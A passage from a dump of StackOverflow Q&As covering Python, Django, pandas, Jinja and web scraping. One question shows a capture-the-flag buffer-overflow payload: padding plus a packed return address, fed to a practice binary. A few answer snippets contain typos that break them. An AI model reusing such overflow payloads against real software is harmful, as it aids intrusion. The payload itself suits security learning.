# checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows) # import the math module for calulations involving logarithm import math # ask the user how many rows the table has rows: int = int(input('how many rows does the table have?')) def which_sort(rows: int) -> str: """ This function first calculates the worst times for both quicksort and merge sort. if mergesort is at least 100 times faster then quick sort it uses mergesort, otherwise quicksort. :param: rows - an integer that counts the amount of rows in a table. """ # if rows is <= 1 worst_mergesort would be 0 resulting in a zerodevision error if rows <= 1: return 'use quicksort' # calculate the worst possible outcomes worst_quicksort: int = rows**2 worst_mergesort: int = rows * math.log(rows) print(worst_mergesort) print(rows) # checks wether the worst of merge sort is 100 faster then the worst of quick sort if worst_mergesort <= (worst_quicksort / 100): return 'use merge sort' else: return 'use quick sort' which_sort(rows)
[ "I think the problem is simply that the base of the logarithm is different in math.log than in a calculator.\nmath.log computes the natural logarithm, so the base is e and the calculators usually use base 10 by default.\nIn math.log, you can specify the base as a second argument e.g. 600*math.log(600, 10) should give you the expected answer.\n" ]
[ 1 ]
[]
[]
[ "logarithm", "math", "python" ]
stackoverflow_0074576392_logarithm_math_python.txt
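A quick numeric check of the answer's point, using the question's rows*log(rows) worst case for merge sort: math.log is base e, math.log10 (or math.log(rows, 10)) matches a typical calculator, and the choice of base only changes the result by a constant factor.

import math

rows = 600

print(rows * math.log(rows))     # natural log, roughly 3838
print(rows * math.log10(rows))   # base 10, roughly 1667
print(rows * math.log2(rows))    # base 2, roughly 5537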
Q: how to iterate through dictionary in a dictionary in django template? My dictionary looks like this(Dictionary within a dictionary): {'0': { 'chosen_unit': <Unit: Kg>, 'cost': Decimal('10.0000'), 'unit__name_abbrev': u'G', 'supplier__supplier': u"Steve's Meat Locker", 'price': Decimal('5.00'), 'supplier__address': u'No\r\naddress here', 'chosen_unit_amount': u'2', 'city__name': u'Joburg, Central', 'supplier__phone_number': u'02299944444', 'supplier__website': None, 'supplier__price_list': u'', 'supplier__email': u'ss.sss@ssssss.com', 'unit__name': u'Gram', 'name': u'Rump Bone', }} Now I'm just trying to display the information on my template but I'm struggling. My code for the template looks like: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {{ ingredient }} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} It just shows me '0' on my template? I also tried: {% for ingredient in landing_dict.ingredients %} {{ ingredient.cost }} {% endfor %} This doesn't even display a result. I thought perhaps I need to iterate one level deeper so tried this: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {% for field in ingredient %} {{ field }} {% endfor %} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} But this doesn't display anything. What am I doing wrong? A: Lets say your data is - data = {'a': [ [1, 2] ], 'b': [ [3, 4] ],'c':[ [5,6]] } You can use the data.items() method to get the dictionary elements. Note, in django templates we do NOT put (). Also some users mentioned values[0] does not work, if that is the case then try values.items. <table> <tr> <td>a</td> <td>b</td> <td>c</td> </tr> {% for key, values in data.items %} <tr> <td>{{key}}</td> {% for v in values[0] %} <td>{{v}}</td> {% endfor %} </tr> {% endfor %} </table> Am pretty sure you can extend this logic to your specific dict. To iterate over dict keys in a sorted order - First we sort in python then iterate & render in django template. return render_to_response('some_page.html', {'data': sorted(data.items())}) In template file: {% for key, value in data %} <tr> <td> Key: {{ key }} </td> <td> Value: {{ value }} </td> </tr> {% endfor %} A: This answer didn't work for me, but I found the answer myself. No one, however, has posted my question. I'm too lazy to ask it and then answer it, so will just put it here. This is for the following query: data = Leaderboard.objects.filter(id=custom_user.id).values( 'value1', 'value2', 'value3') In template: {% for dictionary in data %} {% for key, value in dictionary.items %} <p>{{ key }} : {{ value }}</p> {% endfor %} {% endfor %} A: If you pass a variable data (dictionary type) as context to a template, then you code should be: {% for key, value in data.items %} <p>{{ key }} : {{ value }}</p> {% endfor %} A: I am thankful for the above answers pointing me in the right direction. From them I made an example for myself to understand it better. I am hoping this example will help you see the double dictionary action more easily and also help when you have more complex data structures. 
In the views.py: bigd = {} bigd['home'] = {'a': [1, 2] , 'b': [3, 4] ,'c': [5,6] } bigd['work'] = {'e': [1, 2] , 'd': [3, 4] ,'f': [5,6] } context['bigd'] = bigd In the template.html: {% for bigkey, bigvalue in bigd.items %} <b>{{ bigkey }}</b> <br> {% for key, value in bigvalue.items %} key:{{ key }} <br> ----values: {{ value.0}}, {{value.1 }}<br> {% endfor %} <br> {% endfor %} Notice the list in the second dictionary is accessed by the index in the list. Result in browser is something like:
how to iterate through dictionary in a dictionary in django template?
My dictionary looks like this(Dictionary within a dictionary): {'0': { 'chosen_unit': <Unit: Kg>, 'cost': Decimal('10.0000'), 'unit__name_abbrev': u'G', 'supplier__supplier': u"Steve's Meat Locker", 'price': Decimal('5.00'), 'supplier__address': u'No\r\naddress here', 'chosen_unit_amount': u'2', 'city__name': u'Joburg, Central', 'supplier__phone_number': u'02299944444', 'supplier__website': None, 'supplier__price_list': u'', 'supplier__email': u'ss.sss@ssssss.com', 'unit__name': u'Gram', 'name': u'Rump Bone', }} Now I'm just trying to display the information on my template but I'm struggling. My code for the template looks like: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {{ ingredient }} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} It just shows me '0' on my template? I also tried: {% for ingredient in landing_dict.ingredients %} {{ ingredient.cost }} {% endfor %} This doesn't even display a result. I thought perhaps I need to iterate one level deeper so tried this: {% if landing_dict.ingredients %} <hr> {% for ingredient in landing_dict.ingredients %} {% for field in ingredient %} {{ field }} {% endfor %} {% endfor %} <a href="/">Print {{ landing_dict.recipe_name }}</a> {% else %} Please search for an ingredient below {% endif %} But this doesn't display anything. What am I doing wrong?
[ "Lets say your data is -\ndata = {'a': [ [1, 2] ], 'b': [ [3, 4] ],'c':[ [5,6]] }\nYou can use the data.items() method to get the dictionary elements. Note, in django templates we do NOT put (). Also some users mentioned values[0] does not work, if that is the case then try values.items.\n<table>\n <tr>\n <td>a</td>\n <td>b</td>\n <td>c</td>\n </tr>\n\n {% for key, values in data.items %}\n <tr>\n <td>{{key}}</td>\n {% for v in values[0] %}\n <td>{{v}}</td>\n {% endfor %}\n </tr>\n {% endfor %}\n</table>\n\nAm pretty sure you can extend this logic to your specific dict.\n\nTo iterate over dict keys in a sorted order - First we sort in python then iterate & render in django template.\nreturn render_to_response('some_page.html', {'data': sorted(data.items())})\nIn template file:\n{% for key, value in data %}\n <tr>\n <td> Key: {{ key }} </td> \n <td> Value: {{ value }} </td>\n </tr>\n{% endfor %}\n\n", "This answer didn't work for me, but I found the answer myself. No one, however, has posted my question. I'm too lazy to \nask it and then answer it, so will just put it here.\nThis is for the following query:\ndata = Leaderboard.objects.filter(id=custom_user.id).values(\n 'value1',\n 'value2',\n 'value3')\n\nIn template:\n{% for dictionary in data %}\n {% for key, value in dictionary.items %}\n <p>{{ key }} : {{ value }}</p>\n {% endfor %}\n{% endfor %}\n\n", "If you pass a variable data (dictionary type) as context to a template, then you code should be:\n{% for key, value in data.items %}\n <p>{{ key }} : {{ value }}</p> \n{% endfor %}\n\n", "I am thankful for the above answers pointing me in the right direction. From them I made an example for myself to understand it better. I am hoping this example will help you see the double dictionary action more easily and also help when you have more complex data structures.\nIn the views.py:\n bigd = {}\n bigd['home'] = {'a': [1, 2] , 'b': [3, 4] ,'c': [5,6] }\n bigd['work'] = {'e': [1, 2] , 'd': [3, 4] ,'f': [5,6] }\n context['bigd'] = bigd\n\nIn the template.html:\n{% for bigkey, bigvalue in bigd.items %}\n <b>{{ bigkey }}</b> <br>\n {% for key, value in bigvalue.items %}\n key:{{ key }} <br>\n ----values: {{ value.0}}, {{value.1 }}<br>\n {% endfor %}\n <br>\n{% endfor %}\n\nNotice the list in the second dictionary is accessed by the index in the list.\nResult in browser is something like:\n\n" ]
[ 326, 4, 2, 0 ]
[]
[]
[ "dictionary", "django", "django_templates", "python" ]
stackoverflow_0008018973_dictionary_django_django_templates_python.txt
Q: Bound label to Image From the mnist dataset example I know that the dataset look something like this (60000,28,28) and the labels are (60000,). When, I print the first three examples of Mnist dataset and I print the first three labels of those which are: The images and labels are bounded. I want to know how can I bound a folder with (1200 images) with size 64 and 64 with an excel with a column named "damage", with 5 different classes so I can train a neural network. Like image of a car door and damage is class 3. A: Here's a rough sketch of how you can approach this problem. Loading each image The first step is how you pre-process each image. You can use Python Imaging Library for this. Example: from PIL import Image def load_image(path): image = Image.open(path) # Images can be in one of several different modes. # Convert to single consistent mode. image = image.convert("RGB") image = image.resize((64, 64)) return image Optional step: cropping Cropping the images to focus on the feature you want the network to pay attention to can improve performance, but requires some work for each training example and for each inference. Loading all images I would load the images like this: import glob import pandas as pd image_search_path = "image_directory/*.png" def load_all_images(): images = [] for path in glob.glob(image_search_path): image = load_image(path) images.append({ 'path': path, 'img': image, }) return pd.DataFrame(images) Loading the labels I would use Pandas to load the labels. Suppose you have an excel file with the columns path and label, named labels.xlsx. labels = pd.read_excel("labels.xlsx") You then have the problem that the images that are loaded are probably not in the same order as your file full of labels. You can fix this by merging the two datasets. images = load_all_images() images_and_labels = images.merge(labels, on="path", validate="1:1") # check that no rows were dropped or added, say by a missing label assert len(images.index) == len(images_and_labels.index) assert len(labels.index) == len(images_and_labels.index) Converting images to numpy Next, you need to convert both the images and labels into a numpy dataframe. Example for images: import numpy as np images_processed = [] for image in images_and_labels['img'].tolist(): image = np.array(image) # Does the image have expected shape? assert image.shape == (64, 64, 3) images_process.append(image) images_numpy = np.array(images_processed) # Check that this has the expected shape. You'll need # to replace 1200 with the number of training examples. assert images_numpy.shape == (1200, 64, 64, 3) Converting labels to numpy Assuming you're setting up a classifier, like MNIST, you'll first want to decide on an ordering of categories, and map each element of that list of categories to its position within that ordering. The ordering of categories is arbitrary, but you'll want to be consistent about it. Example: categories = { 'damage high': 0, 'damage low': 1, 'damage none': 2, } categories_num = labels_and_images['label'].map(categories) # Are there any labels that didn't get mapped to something? assert categories_num.isna().sum() == 0 # Convert labels to numpy labels_np = categories_num.values # Check shape. You'll need to replace 1200 with the number of training examples assert labels_np.shape == (1200,) You should now have the variables images_np and labels_np set up as numpy arrays in the same style as the MNIST example.
Bound label to Image
From the MNIST dataset example I know that the dataset looks something like this (60000,28,28) and the labels are (60000,). When I print the first three examples of the MNIST dataset and the first three labels of those, the images and labels are bound together. I want to know how I can bind a folder with 1200 images of size 64 by 64 to an Excel file with a column named "damage" containing 5 different classes, so I can train a neural network. For example, an image of a car door whose damage is class 3.
[ "Here's a rough sketch of how you can approach this problem.\nLoading each image\nThe first step is how you pre-process each image. You can use Python Imaging Library for this.\nExample:\nfrom PIL import Image\n\ndef load_image(path):\n image = Image.open(path)\n # Images can be in one of several different modes.\n # Convert to single consistent mode.\n image = image.convert(\"RGB\")\n image = image.resize((64, 64))\n return image\n\nOptional step: cropping\nCropping the images to focus on the feature you want the network to pay attention to can improve performance, but requires some work for each training example and for each inference.\nLoading all images\nI would load the images like this:\nimport glob\nimport pandas as pd\n\nimage_search_path = \"image_directory/*.png\"\n\ndef load_all_images():\n images = []\n for path in glob.glob(image_search_path):\n image = load_image(path)\n images.append({\n 'path': path,\n 'img': image,\n })\n return pd.DataFrame(images)\n\nLoading the labels\nI would use Pandas to load the labels. Suppose you have an excel file with the columns path and label, named labels.xlsx.\nlabels = pd.read_excel(\"labels.xlsx\")\n\nYou then have the problem that the images that are loaded are probably not in the same order as your file full of labels. You can fix this by merging the two datasets.\nimages = load_all_images()\nimages_and_labels = images.merge(labels, on=\"path\", validate=\"1:1\")\n# check that no rows were dropped or added, say by a missing label\nassert len(images.index) == len(images_and_labels.index)\nassert len(labels.index) == len(images_and_labels.index)\n\nConverting images to numpy\nNext, you need to convert both the images and labels into a numpy dataframe.\nExample for images:\nimport numpy as np\n\nimages_processed = []\nfor image in images_and_labels['img'].tolist():\n image = np.array(image)\n # Does the image have expected shape?\n assert image.shape == (64, 64, 3)\n images_process.append(image)\nimages_numpy = np.array(images_processed)\n# Check that this has the expected shape. You'll need\n# to replace 1200 with the number of training examples.\nassert images_numpy.shape == (1200, 64, 64, 3)\n\nConverting labels to numpy\nAssuming you're setting up a classifier, like MNIST, you'll first want to decide on an ordering of categories, and map each element of that list of categories to its position within that ordering.\nThe ordering of categories is arbitrary, but you'll want to be consistent about it.\nExample:\ncategories = {\n 'damage high': 0,\n 'damage low': 1,\n 'damage none': 2,\n}\n\ncategories_num = labels_and_images['label'].map(categories)\n# Are there any labels that didn't get mapped to something?\nassert categories_num.isna().sum() == 0\n# Convert labels to numpy\nlabels_np = categories_num.values\n# Check shape. You'll need to replace 1200 with the number of training examples\nassert labels_np.shape == (1200,)\n\nYou should now have the variables images_np and labels_np set up as numpy arrays in the same style as the MNIST example.\n" ]
[ 0 ]
[]
[]
[ "deep_learning", "mnist", "neural_network", "python" ]
stackoverflow_0074572024_deep_learning_mnist_neural_network_python.txt
Q: Cannot import settings module in python I'm trying to use the settings module but it shows "ModuleNotFoundError: No module named 'settings'", and when I try to install the module it shows "Requirement already satisfied: python-settings in c:\users\harsh\appdata\local\programs\python\python310\lib\site-packages (0.2.2)" import settings import settings module A: try pip install python-settings to import from python_settings import settings A: If you have Visual Studio, you can create a Python environment (just right-click on it, choose "add environment" and set your python version) in "solution explorer" and then right-click on your new Python environment and choose "Manage python packages...", there you can search and install what you need. If your IDE is not VS you can try to search same things there.
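The first answer's point is that the PyPI package python-settings installs under the import name python_settings, not settings; a bare import settings only resolves if you have your own settings.py module on the import path. A minimal sketch of that second case (the file name and values are illustrative, not taken from the question):

# settings.py -- a plain module you create yourself, next to your script
DEBUG = True
API_URL = "https://example.com"   # illustrative value

# main.py
import settings                   # works only because settings.py is on the import path

print(settings.DEBUG)
print(settings.API_URL)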
Cannot import settings module in python
I'm trying to use the settings module but it shows "ModuleNotFoundError: No module named 'settings'", and when I try to install the module it shows "Requirement already satisfied: python-settings in c:\users\harsh\appdata\local\programs\python\python310\lib\site-packages (0.2.2)" import settings import settings module
[ "try\npip install python-settings\nto import\nfrom python_settings import settings\n", "If you have Visual Studio, you can create a Python environment (just right-click on it, choose \"add environment\" and set your python version) in \"solution explorer\" and then right-click on your new Python environment and choose \"Manage python packages...\", there you can search and install what you need. If your IDE is not VS you can try to search same things there.\n" ]
[ 1, 0 ]
[]
[]
[ "python", "python_module" ]
stackoverflow_0074576312_python_python_module.txt
Q: How to scrape multiple tables with same name? I am trying to scrape a site where the table classes have the same name. There are 3 types of tables and I want to get the headers just once then get all the information from all three tables into a xlsx file. Website = https://wiki.warthunder.com/List_of_vehicle_battle_ratings running the code with vehical = soup.find('table') works. But I only get the first tables information. I've tried changing it into vehical = soup.find_all('table') But that gives me this error. AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? Here is my full code: import pandas as pd import numpy as np import requests from bs4 import BeautifulSoup def updatebr(): url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' headers =[] r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.find('table') for i in vehical.find_all('th'): title = i.text headers.append(title) df = pd.DataFrame(columns = headers) for row in vehical.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text for td in data] length = len(df) df.loc[length] = row_data df.to_excel('brlist.xlsx') Full Error Code: Traceback (most recent call last): File "c:\Python\WT\BRtest.py", line 35, in <module> updatebr() File "c:\Python\WT\BRtest.py", line 24, in updatebr test = vehical.find_all('tr') File "C:\lib\site-packages\bs4\element.py", line 2289, in __getattr__ raise AttributeError( AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? enter code here A: Make it more simple, since you already involve pandas - This wil pd.read_html() all tables in a list an pd.concat() them to a single one: pd.concat( pd.read_html( 'https://wiki.warthunder.com/List_of_vehicle_battle_ratings', attrs={'class':'wikitable'} ), ignore_index=True ).to_excel('brlist.xlsx') country type name ab rb sb 0 Italy Utility helicopter A.109EOA-2 8.7 9 9.3 1 Italy Attack helicopter A-129 International (p) 9.7 10 9.7 ... ... ... ... ... ... ... 1945 USSR Frigate Rosomacha 4 4 4 1946 USSR Motor gun boat Ya-5M 1.3 1.3 1.3 However to answer your question - Since using vehical = soup.find_all('table') you have to performe an additional loop iterating the ResultSet. Used stripped_strings here to simplify. ... url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.select('table.wikitable') pd.DataFrame( [list(row.stripped_strings) for t in vehical for row in t.select('tr:has(td)') ], columns=list(soup.table.tr.stripped_strings) ).to_excel('brlist.xlsx')
How to scrape multiple tables with same name?
I am trying to scrape a site where the table classes have the same name. There are 3 types of tables and I want to get the headers just once then get all the information from all three tables into a xlsx file. Website = https://wiki.warthunder.com/List_of_vehicle_battle_ratings running the code with vehical = soup.find('table') works. But I only get the first tables information. I've tried changing it into vehical = soup.find_all('table') But that gives me this error. AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? Here is my full code: import pandas as pd import numpy as np import requests from bs4 import BeautifulSoup def updatebr(): url='https://wiki.warthunder.com/List_of_vehicle_battle_ratings' headers =[] r = requests.get(url) soup = BeautifulSoup(r.text, 'html.parser') vehical = soup.find('table') for i in vehical.find_all('th'): title = i.text headers.append(title) df = pd.DataFrame(columns = headers) for row in vehical.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text for td in data] length = len(df) df.loc[length] = row_data df.to_excel('brlist.xlsx') Full Error Code: Traceback (most recent call last): File "c:\Python\WT\BRtest.py", line 35, in <module> updatebr() File "c:\Python\WT\BRtest.py", line 24, in updatebr test = vehical.find_all('tr') File "C:\lib\site-packages\bs4\element.py", line 2289, in __getattr__ raise AttributeError( AttributeError: ResultSet object has no attribute 'find_all'. You're probably treating a list of elements like a single element. Did you call find_all() when you meant to call find()? enter code here
[ "Make it more simple, since you already involve pandas - This wil pd.read_html() all tables in a list an pd.concat() them to a single one:\npd.concat(\n pd.read_html(\n 'https://wiki.warthunder.com/List_of_vehicle_battle_ratings',\n attrs={'class':'wikitable'}\n ),\n ignore_index=True\n).to_excel('brlist.xlsx')\n\n\n\n\n\n\ncountry\ntype\nname\nab\nrb\nsb\n\n\n\n\n0\nItaly\nUtility helicopter\nA.109EOA-2\n8.7\n9\n9.3\n\n\n1\nItaly\nAttack helicopter\nA-129 International (p)\n9.7\n10\n9.7\n\n\n...\n...\n...\n...\n...\n...\n...\n\n\n1945\nUSSR\nFrigate\nRosomacha\n4\n4\n4\n\n\n1946\nUSSR\nMotor gun boat\nYa-5M\n1.3\n1.3\n1.3\n\n\n\n\nHowever to answer your question - Since using vehical = soup.find_all('table') you have to performe an additional loop iterating the ResultSet. Used stripped_strings here to simplify.\n...\nurl='https://wiki.warthunder.com/List_of_vehicle_battle_ratings'\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, 'html.parser')\nvehical = soup.select('table.wikitable')\n\npd.DataFrame(\n [list(row.stripped_strings)\n for t in vehical \n for row in t.select('tr:has(td)')\n ],\n columns=list(soup.table.tr.stripped_strings)\n).to_excel('brlist.xlsx')\n\n" ]
[ 1 ]
[]
[]
[ "beautifulsoup", "dataframe", "pandas", "python", "web_scraping" ]
stackoverflow_0074576236_beautifulsoup_dataframe_pandas_python_web_scraping.txt
Q: Converting shellcode hex bytes to text based inputs in Python for an unknown byte value '\x87'? Not a UTF-8 string? So I am currently doing a beginner CTF challengeon pwnable.tw, the "start" challenge specifically. After reversing the challenge binary I found out there was a buffer overflow exploit, and one thing I would have to do to get an ideal starting point would be to leak the stack address by pointing it back to a specific address (0x08048087), so i crafted a payload, that would then overwrite the return address with the address I was aiming for. However, I'm having trouble converting the byte data into a string format to be fed to the vulnerable program. Below is my python code: from pwn import * shellcode = b'A' * 20 shellcode += pack(0x08048087, 32) print(shellcode) I use the pwn library to simplify packing the address, and then I print it and then pipe it into the vulnerable binary as stdin. However, what will happen when I print this, is that rather than printing the string equivalent of the associated hex values of that address, it will instead print this: b'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08' Just a string literal version of the hex values themselves. However, this will of course not be interpreted by the program in the way i intend it to be. So I try to decode it into utf-8 or an ASCII string, or even use str to convert it no matter which way I choose I get the following error: UnicodeDecodeError: 'utf-8' codec can't decode byte 0x87 in position 20: invalid start byte It would seem it can't decode the 0x87, which makes sense, in this case there does not seem to be an equivalent for it to decode to. But then my question becomes how can I deliver my shell code, specifically the hexadecimal address part, to the program in a way that the program will interpret that portion of the overflowed buffer as the address that i intend it to, rather than it being incorrectly mapped since my script gave me a stringified version of the hex values themselves? A: So I ended up finding the answer, it was to use sys.stdout.buffer.write(), rather than print or sys.stdout.write() since sys.stdout.buffer.write() uses a BufferedWriter which simply operates on raw bytes rather than the other two which operate on text/strings. Thank you to everyone in the comments who helped me!
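A minimal sketch of what the accepted answer describes, reusing the payload from the question; pack() and the target address come from the question, the rest is standard library:

import sys
from pwn import pack

payload = b"A" * 20
payload += pack(0x08048087, 32)

# print() turns the bytes into their str repr (b'AAAA...\x87...'), which is what
# ended up being piped; sys.stdout.buffer is the underlying binary stream, so the
# raw bytes are written through unchanged.
sys.stdout.buffer.write(payload)
sys.stdout.buffer.flush()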
Converting shellcode hex bytes to text based inputs in Python for an unknown byte value '\x87'? Not a UTF-8 string?
So I am currently doing a beginner CTF challengeon pwnable.tw, the "start" challenge specifically. After reversing the challenge binary I found out there was a buffer overflow exploit, and one thing I would have to do to get an ideal starting point would be to leak the stack address by pointing it back to a specific address (0x08048087), so i crafted a payload, that would then overwrite the return address with the address I was aiming for. However, I'm having trouble converting the byte data into a string format to be fed to the vulnerable program. Below is my python code: from pwn import * shellcode = b'A' * 20 shellcode += pack(0x08048087, 32) print(shellcode) I use the pwn library to simplify packing the address, and then I print it and then pipe it into the vulnerable binary as stdin. However, what will happen when I print this, is that rather than printing the string equivalent of the associated hex values of that address, it will instead print this: b'AAAAAAAAAAAAAAAAAAAA\x87\x80\x04\x08' Just a string literal version of the hex values themselves. However, this will of course not be interpreted by the program in the way i intend it to be. So I try to decode it into utf-8 or an ASCII string, or even use str to convert it no matter which way I choose I get the following error: UnicodeDecodeError: 'utf-8' codec can't decode byte 0x87 in position 20: invalid start byte It would seem it can't decode the 0x87, which makes sense, in this case there does not seem to be an equivalent for it to decode to. But then my question becomes how can I deliver my shell code, specifically the hexadecimal address part, to the program in a way that the program will interpret that portion of the overflowed buffer as the address that i intend it to, rather than it being incorrectly mapped since my script gave me a stringified version of the hex values themselves?
[ "So I ended up finding the answer, it was to use sys.stdout.buffer.write(), rather than print or sys.stdout.write() since sys.stdout.buffer.write() uses a BufferedWriter which simply operates on raw bytes rather than the other two which operate on text/strings. Thank you to everyone in the comments who helped me!\n" ]
[ 0 ]
[]
[]
[ "buffer_overflow", "exploit", "python", "shellcode", "x86" ]
stackoverflow_0074554479_buffer_overflow_exploit_python_shellcode_x86.txt
Q: How to read names in file upto specific character using Python Group Name: grp1 name1 name2 name3 =============== Group Name: grp2 NAME4 NAME5 NAME6 NAME7 =============== and so on.... mainfile.txt will have above content, here i need to create lists with group names and each list will have its content which is present up to "=========" symbol. For Eg: as per above file content i need to create two lists(which is grp1 and grp2) where my grp1 list will have its own "names" as a content, below for reference. grp1 = ['name1','name2',name3'] grp2 = ['NAME4','NAME5',NAME6', 'NAME7'] Can any one help me achieve this using python? Thanks in advance. A: You can iterate on your file line by line like and check if the content is equal to the separator. This would give you something like this: file = open("myfile.txt", "r+") line = file.readline() groups = [] while line: group = [] while line and line != "===============": group.append(line) line = file.readline() groups.append(group) line = file.readline() edit: I guess you should also add a condition to ignore blank lines and the one with the group name.
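Note that in the answer's loop each line returned by readline() still carries its trailing newline, so the comparison with "===============" never matches, and (as the answer's edit admits) blank lines and the "Group Name:" lines land inside the groups. A hedged sketch that strips each line and skips headers and separators; the file name and group labels follow the question:

def load_groups(path):
    groups = {}                    # e.g. {"grp1": ["name1", "name2", "name3"], ...}
    current = None
    with open(path) as fh:
        for raw in fh:
            line = raw.strip()
            if line.startswith("Group Name:"):
                current = []
                groups[line.split(":", 1)[1].strip()] = current
            elif line.startswith("==="):
                current = None     # separator closes the current group
            elif line and current is not None:
                current.append(line)
    return groups

groups = load_groups("mainfile.txt")
grp1 = groups["grp1"]              # ['name1', 'name2', 'name3']
grp2 = groups["grp2"]              # ['NAME4', 'NAME5', 'NAME6', 'NAME7']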
How to read names in file upto specific character using Python
Group Name: grp1 name1 name2 name3 =============== Group Name: grp2 NAME4 NAME5 NAME6 NAME7 =============== and so on.... mainfile.txt will have the above content; here I need to create lists with the group names, and each list will hold the content that appears up to the "===============" separator. For example, as per the above file content I need to create two lists (grp1 and grp2), where my grp1 list will have its own "names" as content, as shown below for reference. grp1 = ['name1','name2','name3'] grp2 = ['NAME4','NAME5','NAME6','NAME7'] Can anyone help me achieve this using Python? Thanks in advance.
[ "You can iterate on your file line by line like and check if the content is equal to the separator. This would give you something like this:\nfile = open(\"myfile.txt\", \"r+\")\nline = file.readline()\ngroups = []\n\nwhile line:\n group = []\n while line and line != \"===============\":\n group.append(line)\n line = file.readline()\n groups.append(group)\n line = file.readline()\n\nedit: I guess you should also add a condition to ignore blank lines and the one with the group name.\n" ]
[ 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074576454_python_python_3.x.txt
Q: jinja2.exceptions.TemplateSyntaxError: expected token ':', got '}' in html i'm trying to make an if into my code html with flask: {% if {{ role }} = 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> i send {{ role }} from the login but when i execute the code, it say this: enter image description here i'm trying to control the view with permissions, if role is 1 show a div but if is other number, show a diferent div. A: You don't need the {{ }} to refer to variables inside Jinja statements. See here. So provided you have passed a variable role to the template the following will work: {% if role == 1 %} <div id="cabecera"> etc... {% endif %} A: Try this: {% if role == 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> (...) {% endif %}
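Both answers assume a role variable has been passed into the template; for completeness, a minimal sketch of the Flask side (the route, template name and hard-coded role are illustrative, adapt them to your login flow):

from flask import Flask, render_template

app = Flask(__name__)

@app.route("/home")
def home():
    role = 1   # e.g. looked up from the logged-in user or the session
    # role is now usable in home.html as {% if role == 1 %} ... {% endif %}
    return render_template("home.html", role=role)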
jinja2.exceptions.TemplateSyntaxError: expected token ':', got '}' in html
I'm trying to add an if statement to my HTML code with Flask: {% if {{ role }} = 1 %} <div id="cabecera"> <header class="py-3 mb-4 border-bottom"> <div class="container d-flex flex-wrap justify-content-center"> <a href="/home" class="d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none"> I send {{ role }} from the login, but when I execute the code it says this: (error screenshot) I'm trying to control the view with permissions: if role is 1, show one div, but if it is another number, show a different div.
[ "You don't need the {{ }} to refer to variables inside Jinja statements. See here.\nSo provided you have passed a variable role to the template the following will work:\n{% if role == 1 %}\n <div id=\"cabecera\">\n etc...\n{% endif %}\n\n", "Try this:\n{% if role == 1 %}\n <div id=\"cabecera\">\n <header class=\"py-3 mb-4 border-bottom\">\n <div class=\"container d-flex flex-wrap justify-content-center\">\n <a href=\"/home\" class=\"d-flex align-items-center mb-3 mb-lg-0 me-lg-auto text-dark text-decoration-none\">\n(...)\n{% endif %}\n\n" ]
[ 1, 0 ]
[]
[]
[ "css", "flask", "html", "mysql", "python" ]
stackoverflow_0074576569_css_flask_html_mysql_python.txt
Q: replacing a value from df1['colA'] with df2['ColB'] using a unique identifier? Hi I am trying to replace values in a df1 column A with values from df2 column B, by matching them with df2 column A. Basically if the string of row x in df1['a'] is equal to a string of row y in df2['a'] I want to replace the value of df1['a'] with df2['b']. I have tried a couple things but for some reason this isn't working properly. I also wants to replace values that aren't in df2['a'] with None. my sample data is: df1 = pd.DataFrame({'a': ['a','b','a','d','e','f','g', 'h', 'i'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie', "alpha", "beta"], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant','elephant', "zebra"]}) df2 = pd.DataFrame({'a': ['a','b','c','d','e','f','g'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie'], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant']}) df1['UID'] = df1['a']+ df1['b']+df1['c'] df2['UID'] = df2['a']+ df2['b']+df2['c'] df1['a'].loc[df1['UID'].isin(df2['UID'])] = df2['c'] animals = ['elephant','zebra'] df1.loc[~df1['a'].isin(animals), "a"] = "None" This works in my sample data but isn't working in my actual data set which is much larger. Any ideas on how to do something similar to this? A: I think the explanation is not quite correct. Based on your code attempt, I suspect that what you mean is: For each row i of df1 that matches (for all fields (a, b, c)) a row j of df2, then replace df1.loc[i, 'a'] by df2.loc[j, 'c']. If that is the correct interpretation of your question, then: First, it is safer to use a tuple of the row values as UID for the row, instead of the string concatenation: imagine a row '_', 'foo', 'bar' and another '_', 'fooba', 'r' -- they are most certainly distinct. The second advantage of tuple is that it works with other types, not just strings. Thus: df1['UID'] = df1[['a', 'b', 'c']].apply(tuple, axis=1) df2['UID'] = df2[['a', 'b', 'c']].apply(tuple, axis=1) Then, the expected result can be obtained by merging on UID: df = df1.assign( a=df1.merge( df2[['UID', 